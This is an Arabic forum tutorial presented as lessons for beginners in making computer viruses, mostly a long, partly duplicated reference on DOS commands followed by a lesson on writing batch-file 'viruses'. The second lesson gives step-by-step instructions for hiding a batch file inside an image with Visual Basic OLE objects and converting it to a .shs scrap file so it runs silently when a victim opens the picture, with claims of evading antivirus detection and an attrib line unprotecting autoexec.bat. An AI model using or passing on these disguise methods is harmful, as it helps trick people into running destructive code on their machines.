السلام عليكم ورحمــه الله وبركاته /
واش راكم جميع ان شاء الله طيـبيـن .،
اخواني مابي اطول عليكـم ./، بس حبـبيت اسوي الموضوع لـ المبتدئـين في صنع الفيروسات.، ندخل صلب الموضوع،
لابد ان تقسم بالله العظيم الذي فطر السموات والارض انك اذا استخدمت هذة المعلومات لن تضر اي احد من المسلمين بها
اذا كان للرجال عزما فهذا العزوم منا تراخت واذا كان للناس حقا عدلا ففي اسلامنا تراحم
انا بريء منكم يا ذي الكهوم انا كن لله طوعا وانت علي غـــــــــير العادة سئوما ================================================== =
بسم الله الرحمن الرحيم
الفيروسات
الدرس الاول
من منا لا يعرف الفيروسات و اخطارها؟! و التدمير الممكن تحقيقه بهذه الفيروسات!
من يصنع الفيروسات بغرض الاذي, فليس الا مستهتر غبي يستعمل العلم في اشياء مضرة, و من اخطر الفيروسات التي صنعت حتي الان هو فيروس شرنوبيل, الذي يقوم بتدمير الجهاز كليا, اخترعه شاب في الحادي و العشرين من عمره لا يهوي الا التدمير..
مقدمة عن الفيروسات:
تصنع الفيروسات ببرامج مثل دلفي و باسكال ..الخ, اما ما سنصنعه الان ليس فيروسات, بل برامج مدمرة تقوم بنفس عمل الفيروسات, و لا يستطيع النورتن كشفها..
أفكار هذه الفيروسات بسيطة و سهلة, و كلها بأكواد درسناها من قبل, ولكن لتصميم فيروسك الخاص, يجب ان يتوافر لديك الذكاء, انظر الي الامثلة و اعرف طريقة صنع هذه الفيروسات ثم اصنع افكار مثلها..
ارجو من كل اخ مسلم عدم استخدام هذه الفيرووس ضد المسلمين
بس الدرس الاول ذا هيكون عن كلام كتير بس غير الفيروسات بس حاجات تساعدنا في تصنيع الفيروسا اول حاجة ابدا بكل اول الدوس
اوامر الدوس
ذي اوامر الدوس ودي استعن بشرح الاخ سوفا من منتدي القراصنة
كلمة (DOS) اختصار لـ Disk Operating System
* تعريف الـ DOS : هو مجموعة من الأوامر والتعليمات التي تتحكم في مكونات الحاسب الآلي.
-دور الـ DOS في جهاز الكمبيوتر: هو حلقة الوصل بين الكمبيوتر والمستخدم.
-الملفات:
إن أهم الخدمات التي يقدمها الـ DOS هي تنظيم حفظ البيانات في الملفات.
تعريف الملف: هو عبارة عن وعاء لحفظ البرامج أو النصوص أو البيانات، وهو أصغر وحدة للحفظ بالنسبة لنظام التشغيل.
* تسمية الملفات:
ينقسم اسم الملف إلي قسمين:
القسم الأول: وهو الأساس ( ROOT ) ويجب ألا يزيد طوله عن 8 حروف. وهذا الجزء من اسم الملف ضروري - إي يجب وجوده.
القسم الثاني: ويسمى الامتداد ويجب ألا يزيد طوله عن 3 حروف، ويجب أن يفصل بين الاسم ( الأساس) و الامتداد بعلامة النقطة ( . ). وهذا الجزء من الاسم اختياري - يمكن الاستغناء عنه.
-جميع الملفات التي تنتهي بأحد الإمدادات التالية BAT , EXE , COM قابلة للتحميل والتنفيذ المباشر.
ونبين هنا بعض أشهر أنواع الإمدادات المستخدمة مع أسماء ملفاتها الكاملة:
.BAT ملف أوامر تنفذ دفعة واحدة ( BATCH ).
.COM ملف برنامج ( COMMAND ).
***** ملف جاهز للتنفيذ ( EXECUTABLE ).
.DOC ملف نصوص أو وثائق ( ******** ).
.ASM ملف مصدر برنامج مكتوب بلغة التجميع ( ASSEMBLY ).
.BAK ملف احتياطي ( BACKUP ).
.BAS ملف برنامج بيسك ( BASIC ).
.DBF ملف قاعدة بيانات ( DBASE FILE ).
.PAS ملف برنامج مكتوب بلغة باسكال ( PASCAL ).
.SYS ملف تكوين نظام ( SYSTEM ).
.C ملف مصدر مكتوب بلغة سي ( C ).
الرموز المستخدمة في تسمية الملفات:
1-الحروف الأبجدية من A إلي Z ( سواء كانت صغيرة أو كبيرة ).
2-الأرقام من 0 إلي 9 .
3-بعض العلامات مثل: ( { } ، ( ) ، & ، % ، $ ، # ، ! ).
* الشروط التي يجب مراعاتها عند اختيار اسم الملف:
1- طول الاسم الأساسي للملف من 1-8 حروف.
2- يجب ألا يزيد الاسم الممتد -إن وجد- عن 3 أحرف.
3- أن يفصل بين الاسم الأساسي والاسم الممتد -إن وجد- بعلامة النقطة ( . ).
4- أن يكتب الاسم الأساسي والاسم الممتد بدون فراغات.
5- عدم استخدام مفاتيح التحكم وهي : ( ALT ، CTRL ، ESC ) في أي اسم .
6- عدم استخدام الأسماء المحجوزة لنظام التشغيل مثل CON الخاص يلوحة المفاتيح و شاشة العرض أو PRN الخاص باسم الطابعة.
7- عدم استخدام الرموز ذات الدلالة الخاصة لنظام التشغيل وهي * ، / ، ، + ، = ، ؟).
تنظيم الملفات على القرص:
للحصول على ملفات منظمة على القرص يجب إنشاء الدليل ( Directory ) فذلك يسهل التعامل مع الملفات وترتيبها بسهولة.
-تعريف الدليل ( Directory ): هو عبارة عن مجموعة ملفات توضع تحت مسمى دليل معين.
-أقسام الأدلة: تقسم الأدلة إلي أربعة أقسام:
1-الدليل الرئيسي: وهو الدليل الذي يقوم Dos بإنشائه تلقائياً عند تشكيل الاسطوانة وتوضع تحته جميع الملفات المنشأة.
2-الدليل الفرعي: وهو الذي ينشأ تحت دليل رئيسي ( subdirectory ).
ونظرا لأن مستخدم الكمبيوتر يتعامل مع عدد كبير من الملفات لذلك يفضل أن توزع هذه الملفات في أدلة فرعية.
-ويمكن إنشاء الأدلة الفرعية داخل الدليل الرئيسي أو داخل أدلة فرعية أخرى.
-الفرق بين الدليل الرئيسي والدليل الفرعي: هو أن النظام ينشئ الدليل الرئيسي تلقائياً، بينما ينشئ المستخدم الدليل الفرعي.
-يوجد دليل رئيسي واحد في كل قرص بينما قد يوجد في القرص عدة أدلة فرعية.
3-الدليل الأبوي: وهو نوع من الأدلة تتفرع منه أدلة فرعية عديدة فيصبح دليلاً أبوياً لهم.
ومثال على ذلك:
SCHOOLCLASS
إن الدليل ( SCHOOL ) في المثال السابق يعتبر دليلاً أبوياً للدليل الفرعي ( CLASS ).
4-الدليل الحالي: وهو الدليل الذي يكون مستخدما وقت العمل عليه ، وكذلك هو الدليل الذي يتم التعامل مع ملفاته بدون أن يسبقها اسم دليل آخر - لا يرتبط بدليل أبوي.
* طريقة تحميل نظام التشغيل من الأسطوانة المرنة: هناك طريقتين لعمل ذلك :
الطريقة الأولى: ( يجب أن يكون الجهاز مغلق )
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بتشغيل جهاز الكمبيوتر .
الطريقة الثانية: (حين يكون الجهاز يعمل)
1-ندخل اسطوانة الدوس في محرك الأقراص A.
2-نقوم بالضغط على المفاتيح التالية معا: ALT + CTRL + DELETE .
* رموز محركات الأقراص في نظام التشغيل ( DOS ):
1- الأسطوانة المرنة ( Floppy Disk ): ويوجد هناك نوعين من الأسطوانات المرنة وهما :
أ-أسطوانة مرنة حجم 3.5 بوصة.
ب-أسطوانة مرنة حجم 5.25 بوصة.
-ويرمز لمحرك الأسطوانات المرنة بالرمز A أو B.
2-القرص الصلب ( Hard Disk ): ويرمز له بالرمز C.
3- ( CD-ROM ): ويرمز له بالرمز D أو E.
* طريقة التنقل بين محركات الأقراص: بالضغط على الرمز ثم نلحقه بـ :
* الملفات الأساسية لنظام التشغيل الـ ( DOS ):
يتكون نظام التشغيل من ثلاثة ملفات أساسية تمثل البنية الأساسية للنظام والعمود الفقري له وهي كالتالي:
أولاً: IO.SYS : وهذا الملف خاص بالتحكم في الإدخال والإخراج.
ثانياً: MSDOS.SYS : وهذا الملف يحتوي على مجموعة كبيرة من الأوامر التي توضع في الذاكرة عند التشغيل.
ثالثاً: COMMAND.COM : وهذا الملف يحتوي على جميع أوامر نظام التشغيل الداخلية .
* مكونات نظام التشغيل:
ينقسم نظام التشغيل إلي ثلاثة أجزاء رئيسية :
الجزء الأول منه يتحكم في الأجهزة والجزء الثاني عبارة عن مجموعة من التعليمات والأوامر تعمل بصورة تلقائية لا دخل للمستخدم فيها ولا يمكنه التحكم بها وهي مخزنة في ذاكرة القراءة فقط ( ROM ) والتي لايمكن مسحها أو تعديلها والجزء الثالث عبارة عن مجموعة من الأوامر و البرامج تعتبر خدمات للمستخدم وتيسر له استخدام الكمبيوتر .
* الاختصارات :
يستخدم نظام التشغيل ( DOS ) اختصارين اثنين عوضاً عن أسماء الملفات أو جزء منها داخل صيغة الأوامر وهما:
1) الرمز ( ? ) : ويستخدم للدلالة على غياب حرف واحد فقط من اسم أحد الملفات.
2) الرمز ( * ) : ويستخدم للدلالة على غياب أي عدد من الحروف (بشرط أن لا يتجاوز 8 أحرف).
* الأوامر:
تنقسم أوامر الـ DOS إلى قسمين:
1- الأوامر الداخلية : وهي الأوامر التي يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز ويتم تنفيذها من الذاكرة بمعنى أن هذا النوع من الأوامر لا يستلزم وجود أسطوانة لتنفيذه.
من أمثلة الأوامر الداخلية:
CLS - TIME - DATE - MD - CD - RD - DIR - DEL
2-الأوامر الخارجية : وهي الأوامر التي لا يتم تحميلها إلى ذاكرة الـ RAM أثناء تشغيل الجهاز وإنما تبقى على الأسطوانة وليتم تنفيذ إي أمر منها يشترط وجود اسطوانة نظام التشغيل داخل المشغل المرن أو الصلب.
من أمثلة الأوامر الخارجية:
FORMAT - DISKCOPY - DISKCOMP - COMP - SYS - EDIT
- تنقسم أوامر نظام التشغيل الداخلية والخارجية إلي ستة أنواع :
1-أوامر النظام:
MEM
DATE
VER
DosKey
PROMPT
CLS
VSAFE
MEMMAKER
MODE
COMMAND
MSD
TIME
DEFRAG
2-أوامر الاسطوانة:
SCANDISK
CHKDSK
FORMAT
DISKCOMP
DISKCOPY
MSBACKUP
SYS
LABEL
FDISK
UNFORMAT
VOL
3-أوامر الفهرس:
APPEND
DIR
CD
RD
MOVE
DATE
DELTREE
MD
TREE
4-أوامر الملفات:
TYPE
COPY CON
COPY
ATTRIB
DEL
REN
UNDELETE
XCOPY
PRINT
FIND
EDIT
SORT
MSAV
MORE
HELP
5-الأوامر الحزمية:
REM
CALL
ECHO
FOR
IF
PAUES
SHIFT CHOICE
GOTO
6-أوامر خاصة ونادرة الاستخدام:
FASTOPEN
MSCDEX
CHCP
INTERLNK
QBASIC
DRVSPACE.SYS
LOADFIX
SHARE
FASTHELP
NLSFUNC
CTTY
INSTALL.HIGH
RECOVER
DEBUG
KEYB
* شرح لأهم الأوامر المستخدمة في نظام الـ DOS :
1-الأمر: VER ( وهو اختصار كلمة VERSION وتعني إصدار ) وهو من الأوامر الداخلية ووظيفته الاستعلام عن رقم إصدار نظام التشغيل الـ MS-DOS .
ومثال على ذلك قم بكتابة الأمر VER في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر MS-DOS VER 6.22 .
-ملاحظة: هذه الإجابة تختلف من جهاز إلي آخر حسب نسخة نظام التشغيل .
2-الأمر: DATE ( التاريخ ) وهو من الأوامر الداخلية ووظيفته عرض التاريخ الموجود بالجهاز مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر DATE في الـ DOS:
ثم بالضغط على مفتاح ENTER سيظهر current Date is THU 03-25-99 وكذلك Enter New Date mm-dd-yy للتعديل ولإدخال التاريخ الجديد تسجل أولاً الشهر ثم اليوم ثم السنة وإذا لم نرغب في كتابة تاريخ جديد يكفي الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ.
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب التاريخ .
-شروط كتابة التاريخ في نظام التشغيل DOS:
1-نظام التشغيل لا يقبل إي تاريخ قبل سنة 1980.
2-لا يمكن استخدام التاريخ الهجري.
3-لا يمكن كتابة الأشهر بالحروف.
4-لا يمكن استخدام النقطتين الرأسيتين : كفاصل بين في التاريخ
5-أن تستخدم في كتابة التاريخ النظام الأمريكي (mm-dd-yy) الشهر ثم اليوم ثم السنة .
3-الأمر: TIME ( الوقت ) وهو من الأموامر الداخلية ووظيفته عرض الوقت المسجل داخل جهاز الحاسب مع إمكانية تعديله.
ومثال على ذلك قم بكتابة الأمر TIME في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر current Time is : 4:40:55.75a وكذلك Enter New Time للتعديل وذلك بأن تسجل أولاً الساعات ثم الدقائق ثم الثواني ثم كسر الثواني ثم تحديد الوقت صباحاً أو مساءاً وإن لم ترغب في كتابة وقت جديد يكفيك الضغط على مفتاح الإدخال ENTER بدون كتابة إي شئ .
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب الوقت .
4-الأمر: CLS ( وهو اختصار لجملة Clear The Screen وتعني مسح الشاشة ) وهو من الأوامر الداخلية ووظيفته هي تنظيف الشاشة من كافة البيانات التي عليها وإرجاع محث التشغيل إلي أول سطر على الشاشة مهما كان موقعه أثناء تنفيذ الأمر.
ومثال على ذلك قم بكتابة الأمر CLS في الـ DOS :
ثم بالضغط على مفتاح ENTER سيتم تنظيف الشاشة من البيانات الموجودة عليها وليس مسح البيانات.
5-الأمر : PROMPT وهو من الأوامر الداخلية ووظيفته تغيير شكل محث التشغيل لنظام التشغيل.
ومن أهم استخدامات الأمر PROMPT التالي:
PROMPT $D تغيير شكل المحث C إلي علامة تاريخ اليوم
PROMPT $T تغيير شكل المحث C إلي علامة الوقت الحالي
PROMPT $Q تغيير شكل المحث C إلي علامة =
PROMPT $$ تغيير شكل المحث C إلي علامة $
PROMPT $V تغيير شكل المحث C إلي رقم إصدار نظام التشغيل
6-الأمر: VOL ( وهو اختصار لكلمة Volume Label ) وهو من الأوامر الداخلية ووظيفته عرض اسم الأسطوانة الداخلي
ومثال غلى ذلك قم بكتابة الأمر VOL في الـ DOS
ثم بالضغط على مفتاح ENTER سيظهر Volume in drive C is alwafa
-ملاحظة: هذه الإجابة طبعاً تختلف من جهاز إلي آخر حسب اسم القرص .
7-الأمر : DIR وهو من الأوامر الداخلية ووظيفته عرض الملفات الموجودة على الفهرس الحالي ومن خلاله نستطيع عرض :
1-اسم الاسطوانة والرقم المسلسل لها.
2-اسم الفهرس الحالي والمسار الحالي له.
3-عرض الملفات الموجودة بخمس بيانات(اسم الملف -نوع الملف (امتداده) -مساحة الملف بالبايت (حجم الملف)-تاريخ إنشاء الملف -وقت إنشاء الملف) .
4-عرض الفهارس الموجودة بأربعة بيانات وهي (-اسم الفهرس-علامة الفهرس وتكون على الشكل < DIR > بجوار اسم الفهرس-تاريخ إنشاء الفهرس -وقت إنشاء الفهرس ).
5-رسالة تعرض إجمالي عدد الملفات الموجودة بالفهرس الحالي والذي يتم عرضه وكذلك المساحة الكلية لهذه الملفات.
6-المساحة الحرة أو الشاغرة على الاسطوانة أو القرص .
أهم صور استخدامات الأمر DIR:
DIR/P لعرض الملفات صفحة صفحة
DIR/W لعرض الملفات بعرض الشاشة
DIR/B لعرض أسماء الفهارس والملفات ونوعها فقط
DIR/L لعرض أسماء الفهارس والملفات بالحروف الصغيرة
DIR/S لعرض كل الملفات والفهارس الموجودة بالفهرس الحالي
DIR/O لعرض الفهارس والملفات مرتبة ترتيب أبجدي من A إلي Z
DIR/OS لعرض الفهارس والملفات مرتبة حسب مساحتها بالبايت من الأصغر إلي الأكبر
DIR/AH عرض الملفات المخفية فقط
DIR/AR عرض ملفات القراءة فقط وهي محمية من الإلغاء
DIR/AS عرض ملفات النظام فقط
DIR/AD عرض جميع الفهارس فقط بدون الملفات
DIR/AA عرض الملفات التي تحمل علامة الأرشيف فقط
8-الأمر: MD ( وهو اختصار لكلمة Make Directory ) وهو من الأوامر الداخلية ووظيفته إنشاء فهرس فرعي من الفهرس الرئيسي أو إنشاء فهرس فرعي من فهرس فرعي آخر.
9-الأمر : CD (وهو اختصار لكلمةChange Directory ) وهو من الأوامر الداخلية ووظيفته:
1-معرفة الفهرس الحالي
2-الانتقال بين الفهارس إما من:
-رئيسي إلي فرعي
-فرعي إلي رئيسي
وإذا أردنا معرفة الفهرس الحالي الذي نقف عليه نكتب الأمر CD فقط ثم نقوم بالضغط على مفتاح ENTER
10-الأمر RD ( وهو اختصار لكلمة Remove Directory ) وهو من الأوامر الداخلية ووظيفته حذف أو إزالة الفهرس الفرعي ،ولحذف أو إزالة إي فهرس فرعي فهناك شرطين:
1- إزالة جميع الملفات والبرامج الموجودة داخل الفهرس الفرعي المراد إزالته.
2- ألا يكون الفهرس الفرعي المراد إزالته هو الذي نقف عليه الآن بل يجب أن نكون على فهرس آخر أعلى منه رتبة.
11-الأمر : COPY وهو من الأوامر الداخلية ووظيفته نسخ ملف أو مجموعة ملفات في نفس الفهرس أو فهرس آخر أو في أسطوانة أخرى.
12-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
ومن عيوب الأمر COPY CON إنه:
1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
-ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة.
-ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Re**** ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى
-الأمر: COPY CON وهو من الأوامر الداخلية ووظيفته إنشاء وكتابة ملفات نصية جديدة من لوحة المفاتيح وعرضها وطباعتها.
ومن عيوب الأمر COPY CON إنه:
1-لا يمكن الصعود لسطر قد تمت كتابته وتم الضغط على مفتاح الإدخال ENTER.
2-لا يمكن فتح ملف للتعديل به بعد حفظه من نفس الأمر بل يكون من محرر النصوص الموجود مع نظام التشغيل DOS وهو EDIT .
-ملاحظة:لحفظ الملف المنشأ عن طريق الأمر COPY CON قم بعمل إحدى الخطوات التالية:
أ-الضغط على مفتاحي ctrl+z ثم الضغط على مفتاح الإدخال.
ب-الضغط على مفتاح F6 ثم الضغط على مفتاح الإدخال.
13-الأمر: TYPE وهو من الأوامر الداخلية ووظيفته عرض محتويات الملفات النصية على الشاشة.
-ملاحظة:يقوم هذا الأمر بعرض الملفات النصية أما الملفات التي من النوع EXE-COM-SYS فلا يمكن عرضها .
14-الأمر: REN (وهو اختصار لكلمة Re**** ) وهو من الأوامر الداخلية ووظيفته تغيير اسم الملف أو نوعه أو كلاهما .
مثال(1):
15-الأمر: DEL ( وهو اختصار لكلمة DELETE ) وهو من الأوامر الداخلية ووظيفته مسح ملف أو مجموعة ملفات في نفس الفهرس أو في فهرس آخر أو في أسطوانة أخرى.
ملاحظة: في حال مسح كل الملفات لا بد من ظهور الرسالة التأكيديه التالية:
All Files in directory will be deleted
Are you Sure Y/N
وإذا أردت حذف جميع الملفات أضغط حرف Y وإذا أردت إلغاء العملية اضغط N.
16-الأمر: PATH وهو من الأوامر الداخلية ووظيفته فتح مسار أو عدة مسارات على مجموعة محددة من الفهارس على أسطوانة واحدة أو عدة أسطوانات وذلك حتى يسهل التعامل مع الملفات الواقعة عليها من إي موقع ويدرج أمر PATH إلى ملف Autoexec.bat في سطر واحد (لو تكرر الأمر وبصورة مختلفة سيحفظ منه فقط آخر صورة له في آخر سطر ) ويوصف بداخله كل الفهارس التي نرغب بالتعامل معها مباشرة بدون إستخدام الأمر CD للدخول إليها.
-ملاحظات هامة:
1-يوضع أمر PATH داخل ملف Autoexec.bat في سطر واحد .
2-من الممكن كتابة أمر PATH على إي مشغل أقراص في كل مرة تفتح فيها حاسبك.
مثال على ذلك قم بكتابة الأمر PATH على الـ DOS لكي تعرف اسم المسار الموجود بالجهاز.
17-الأمر: MEM وهو من الأوامر الخارجية ووظيفته إعطاء تقارير كاملة عن حالة جميع أنواع الذاكرة.
18-الأمر: MODE وهو من الأوامر الخارجية ووظيفته:
1-التحكم في حجم الكتابة وعرضها على الشاشة.
2-إعطاء تفاصيل عن الملحقات المتصلة بالحاسب وما إذا كانت متصلة معه على التوالي أو على التوازي.
19-الأمر: DOSKEY وهو من الأوامر الخارجية ووظيفته:
1-استدعاء وتعديل اسطر الأوامر وذلك باستدعاء كل ما سبق تنفيذه من أوامر .
2-إنشاء ما يسمى بالماكرو ( Macros ) وهو عبارة عن مجموعة من الأوامر تجمع تحت اسم واحد ويعطى لها مفتاح معين لتشغليها بخطوة واحدة.
-ملاحظة هامة: الأمر DOSKEY يقوم بحجز 4 كليو بايت من الذاكرة الأساسية.
20-الأمر: MSD وهو من الأوامر الخارجية ووظيفته:
1-اكتشاف مواصفات الحاسب من حيث:
( نوع المعالج - حجم الذاكرة - أنواع مشغلات الأقراص - مواصفات نظام العرض - وباقي المكونات).
2-الحصول على تقارير فنية تفيد باكتشاف المشاكل التي حدثت على الحاسب مثل تلف شرائح الذاكرة الـ RAM .
21-الأمر: Command وهو من الأوامر الخارجية ووظيفته تفسير أوامر نظام التشغيل الداخلي.
22-الأمر: DEFRAG وهو من الأوامر الخارجية ووظيفته تتمثل برفع كفاءة التشغيل للقرص الصلب أو القرص المرن حيث إنه يقوم بتجميع الملفات المبعثرة إلي جوار بعضها وبالتالي توفير مساحة إضافية.
23-الأمر: FORMAT وهو من الأوامر الخارجية ووظيفته تهيئة الأسطوانة الصلبة أو المرنة.
24-الأمر: LABEL وهو من الأوامر الخارجية ووظيفته إعادة تسمية الاسطوانة أو تعديل إسمها أو مسحه.
25-الأمر: DISKCOPY وهو من الأوامر الخارجية ووظيفته نسخ أسطوانة مرنة على أخرى مطابقة لها تماما من حيث النوع والحجم والسعة ويقوم بنسخ كامل الملفات حتى المخفية.
ملاحظة : (الأمر COPY والأمر XCOPY لا يستطيعان نقل الملفات المخفية).
26-الأمر: CHKDSK وهو من الأوامر الخارجية ووظيفته فحص الأسطوانة وإعطاء تقرير عن حالتها.
27-الأمر: UNFORMAT وهو من الأوامر الخارجية ووظيفته إستعادة محتويات أسطوانة ما كانت قد مسحت جميع محتوياتها من خلال الأمر FORMAT.
-ملاحظة هامة:
يستطيع الأمر UNFORMAT إعادة محتويات الأسطوانة التي سبق عمل تهيئة لها ولكن بشرط عدم إستخدامها مسبقاً مع الأمر FORMAT عند التهيئة وإلا فأنه يستحيل إعادة محتويات الأسطوانة كما كانت .
28-الأمر: SYS وهو من الأوامر الخارجية ووظيفته:
1-نسخ ملفات نظام التشغيل MS-DOS إلي أسطوانة ما.
2-نسخ ملف COMMAND.COM إلي أسطوانة ما.
29-الأمر: DISKCOMP وهو من الأوامر الخارجية ووظيفته المقارنة بين اسطوانتين متطابقتين .
ملاحظة: هذا الأمر لا ينفع التعامل به مع أقراص صلبة على الإطلاق.
30-الأمر: SCANDISK وهو من الأوامر الخارجية ويستخدم لاكتشاف إي أجزاء تالفة على القرص .
31-الأمر: FDISK وهو من الأوامر الخارجية ووظيفته تهيئة وإعداد القرص الصلب للتعامل مع نظام التشغيل DOS.
32-الأمر: TREE وهو من الأوامر الخارجية ووظيفته عرض أسماء الفهارس المكونة لشجرة الفهارس وكذلك عرض مساراتها.
33-الأمر: MOVE وهو من الأوامر الخارجية ووظيفته نقل ملف أو أكثر أو فهرس فرعي من مكان لآخر.
34-الأمر: DELTREE وهو من الأوامر الخارجية ووظيفته حذف فهرس فرعي بما يحتويه حتى لو كان بداخله ملفات.
35-الأمر: UNDELETE وهو من الأوامر الخارجية ووظيفته استعادة الملفات الممحاة بواسطة الأمر DEL.
ملاحظات هامة:
1-عندما يتم حذف ملف بالأمر DEL فإن نظام التشغيل DOS يقوم بتغيير الحرف الأول من هذا الملف وتحويله إلي علامة ؟.
2-يمكن استرجاع ملف قبل تخزين إي ملف آخر جديد على الملف السابق.
36-الأمر: ATTRIB وهو من الأوامر الخارجية ووظيفته يعرض ويتحكم في صفحات الملف وذلك بتغيير خصائصه كجعله مثلاً ملف خفي أو ملف نظام أو قابل للقراءة فقط أو غير ذلك.
37-الأمر: PRINT وهو من الأوامر الخارجية ووظيفته طباعة الملفات النصية فقط.
38-الأمر: XCOPY وهو من الأوامر الخارجية ووظيفته نسخ مجموعة من الملفات أو الفهارس .
39-الأمر: EDIT وهو من الأوامر الخارجية وهو عبارة عن محرر نصوص تابع لنظام التشغيل DOS والذي من خلاله تتمكن من كتابة وتعديل الملفات.
-ملاحظات هامة:
يعالج هذا الأمر جميع عيوب الأمر COPY CON حيث أنه باستخدامه يمكن عمل الآتي:
1-فتح ملف سبق حفظه والتعديل فيه.
2-التحرك داخل الملف يميناً ويساراً ولأعلى ولأسفل .
3-يتم حفظ الملف باستخدام Alt+F ثم نختار أمر Save ثم كتابة أسم الملف.
-يتم الخروج من الأمر باستخدام Alt+F ثم نختار أمر Exit.
-لكي يعمل الأمر EDIT لابد من وجود ملف QBASIC*****.
بسم الله الرحمن الرحيم
الفيروسات
الدرس الثاني
طريقة صناعة الفيروسات عن طريق الملفات الدفاعية
الدرس الثاني
1-تعريف الملفات الدفاعية :
هي عبارة عن حزمة من اوامر نظام التشغيل DOS يمكننه من خلاله استخدام اكثر من امر دوسي في وقت واحد مما يسهل للمستخدم الاستخدام مثل استخدام اكثر من امر format,copy,cd ..... |393|
2-.طرق صناعة الملفات الدفاعية :
الطريقة الاولى :
-----------------
1.افتح -----> start واضغط على Run واكتب command واضغط على ENTAR
2.اكتب امر(copy con) ثم اسم الفيروس |564| و الامتداد bat ثم اضغط Enter
3.اكتب الكود
4.لحفظ طريقتان هما
1.اضغط على F6 ومن ثم Enter
2.اضغط على Ctrl + z و من ثم Enter
الطريقة الثانية :
-----------------
1.ابدأ -----> البرامج -----> البرامج الملحقة -----> المفكرة Notepad
2.اكتب الكود
3.احفظ الفيروس بامتداد bat و حدد الموقع
الطريقة الثالثة :
-----------------
1.ابدأ -----> البرامج -----> DOS
2.اكتب Edit
3.ادخل الكود |312|
4.قم بحفظ الملف بمتداد bat و حدد المسار الخاص به
3-ايعازات التشغيل :
الايعاز الوظيفة
Echo تمنع عمل الإيعاز ( تعرض سطر على الشاشة )
Nul نقل بدون السؤال نعم-لا
Call الدخول الى ملف
@ يمنع عرض السطر على الشاشة
Cls يمسح الشاشة
Puse يقول للضحية الضغط على اي زر
Start بعد هذا الامر ضع اسم اي برنامج ليتم تغيله عند تشغيل الفيروس
End يوضع في نهاية الفيروس و هو ينهي الفيروس بعد تنفيذ الاوامر
/n ايعاز لا
cd\ الدخول الى ملف
\cd الخروج من ملف
/y ايعاز نعم |364|
***ارجوا ان تكون واضحة و هي سهلة الاستخدام
4-طريقة تشفير الفيروس :
اخواني هذه الطريقة ليست لتشفير الفيروس فقط بل لدمج الفيروس و تغير امتداد الفيروس اما سبب تغير الامتداد من bat الى exe فسوف اذكر السبب في الدرس الرابع في قسم اسئلة و حلول ...
يمكنك تغير امتداد الـ Batch عن طريق برنامج Microsoft Visual Basic في الاصداران الخامس و السادس :
1.افتح برنامج الفيجول بيسك
2.اختر الاداة OLD من قائمة الادوات سوف تظهر لك نافذة Insert Object اختر منها Create from File ثم
اضغط على Browse واختر الصورة التي تريدها أو مقطع فلم أو اي شيء تريده ثم اضغط على OK
3.اختر اداة OLE مره اخرى وارسم مربع ثاني واختار Create from File ثم Browse واختر الباتش
الذي تريده ثم اضغط OK
4.ادخل كود الفروم :
----------------------------------
Microsoft Visual Basic 5.0 :
LE1.DoVerb OLE2.DoVerb
----------------------------------
Microsoft Visual Basic 6.0 :
OLE1.DoVerb
OLE2.DoVerb
me.hide ' تـقوم باخفاء الفورم
----------------------------------
5.من قائمة File اختر Make Project1***** سوف تأتيك نافذة باسم Make Project اكتب اسم الملف الذي تريد تسميته مثلا اكتب Virus |105| لقد انتهينا من دمج الباتش مع الصوره ولكن امتداده EXE
6.الان سوف نقوم بتغيير امتداد EXE الى امتداد غير معروف|104| من قبل الكثير من مستخدمي الانترنت والامتداد
هو SHS وهذا الامتداد جدا خطير لما فيه من امكانيات الاتصال مع البرامج الاخرى وهو Scrap Object
والطريقه هي كالتالي :
1.قم بتشغيل برنامج WordPad افتح البرنامج وصغر النافذه وافتح مجلد الذي حفظت فيه ملف
الباتش+الصورة حاول تنسق النوافذ والان اضغط على البرنامج Virus بالزرار الايسر مره واحده ولا ترفع اصبعك عن الزرار ثم اسحبه الى برنامج WordPad سوف ينتقل الملف الى البرنامج بكل سهوله ثانيا اضغط بالزر الايمن على
2.الملف الذي انتقل الى WordPad اختر Package Object ثم Edit Package سوف تظهر لك نافذه بأسم Object Packager - Package in ******** اختر قائمة Edit ثم Copy Package ثالثا واخيرا اختر المجلد الذي به ملف EditServer ثم اضغط في المكان الفارغ على الزرار الايمن ثم اختر Paste (لصق) سوف يتكون لك ملف شكله غريب باسم Scrap وهذا |535| هوالملف قد تغير امتداده الى shs واذا ضغط عليه دبل كلك سوف تظهر لك صوره وسوف يشتغل ايضا ملف الباتش الذي دمجته مع الصوره والآن قد حصلت على باتش مرفق بصوره .
الامر Call يتصل في ملف معين اما الامر start يبدأ بتنفيذ امر او تشغيل برنامج
مثال (1) :
كود PHP:
call attrib -h -r c:autoexec.bat >nul
اخوي في هذا المثال استخدمنا الامر Call للاتصال في الملف autoexec و قمنا بتغير خصائصه
مثال (2) :
كود PHP:
start MSPaint
في هذا المثال امرنا بتشغيل برنامج الرسام اول ما يبدا الفيروس عمله
